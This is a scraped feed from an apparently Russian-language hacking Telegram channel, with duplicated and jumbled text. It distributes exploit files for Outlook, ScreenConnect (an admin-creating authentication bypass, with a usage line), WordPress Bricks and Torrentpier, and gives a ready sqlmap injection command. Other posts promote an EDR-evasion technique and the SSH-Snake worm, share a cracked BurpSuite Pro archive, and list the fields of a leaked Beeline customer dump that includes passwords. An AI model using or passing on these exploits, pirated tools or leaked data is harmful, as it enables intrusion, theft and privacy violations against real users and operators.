Свежая техника обхода
Кому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки
Суть вот в чем,
Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда
*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader
#EDR #malware
EDRКому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки
DLL EDR.Суть вот в чем,
EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда
EDR в лохматой жопе.*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader
#EDR #malware
🔥21
Грязный
однострочник для быстрого обнаружения
*
BASHоднострочник для быстрого обнаружения
XSS в файлах PHP*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities🔥35👍8👌1
Прощай NGINX
*
теперь и
Глав разраб форкнул проект и теперь будет
Почитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось
#fuck
*
ESXI умер пару дней назадтеперь и
NGINX умерГлав разраб форкнул проект и теперь будет
FreeNginxПочитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось
#fuck
😱32🔥11👍2👌2
cve-2024-21413_outlook_rce.sh
1.1 KB
CVE-2024-21413
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
🔥16👍3
burpsuite_pro_v2024.zip
692.2 MB
BurpSuite PRO version 2024.1.1.1
+BurpBountyPro_v2.8.0
ru+eng
+manual
+BurpBountyPro_v2.8.0
ru+eng
+manual
🔥29😱5👌3👍2
Proxy Bar
Beeline потёк
В дампе поля:
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
👍21🔥1
Proxy Bar
Beeline потёк
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
👍26
Побег из VirtualBox 7.0.10
ДЫрки в
Почитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit
#virtualbox #escape
ДЫрки в
virtio-netПочитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit
#virtualbox #escape
🔥27😱6👌3👍1
watchtowr-vs-ConnectWise_2024-02-21.py
2.6 KB
ScreenConnect POC
*
Обход аутентификации для добавления нового пользователя-администратора в
*
Usage:
*
*
Обход аутентификации для добавления нового пользователя-администратора в
ConnectWise ScreenConnect.*
Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!*
👍17🔥7👌2
exploit.py
6.2 KB
CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине
*
requirements:
*
#RCE #wordpress
*
Дыра в плагине
Bricks Builder*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich*
#RCE #wordpress
🔥21👍4👌3
ChatBot для WordPress
*
SQL-инъекция через параметр $strid в версии до 4.8.9 включительно
*
ТЫКНУТЬ
а я споть
*
SQL-инъекция через параметр $strid в версии до 4.8.9 включительно
*
ТЫКНУТЬ
python3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p stridа я споть
👍31🔥12😱4👌4
SSH-Snake Tool for ....lulz
*
Это идеальное сочетание лени, глупости и божьей искры )))
То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.
Ну не удивительно что черные шляпы мигом взяли на вооружение 😆
Правильное название должно быть
ТДН во все поля )
*
SSH-Snake
*
Почитать
#worm #ssh
*
Это идеальное сочетание лени, глупости и божьей искры )))
То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.
Ну не удивительно что черные шляпы мигом взяли на вооружение 😆
Правильное название должно быть
ssh-wormТДН во все поля )
*
SSH-Snake
*
Почитать
#worm #ssh
🔥19👍5👌1
2024-1651_exploit.py
4.6 KB
CVE-2024-1651 exploit (RCE)
*
Дырка в
#exploit #rce #linux
*
Дырка в
Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.#exploit #rce #linux
🔥10👍4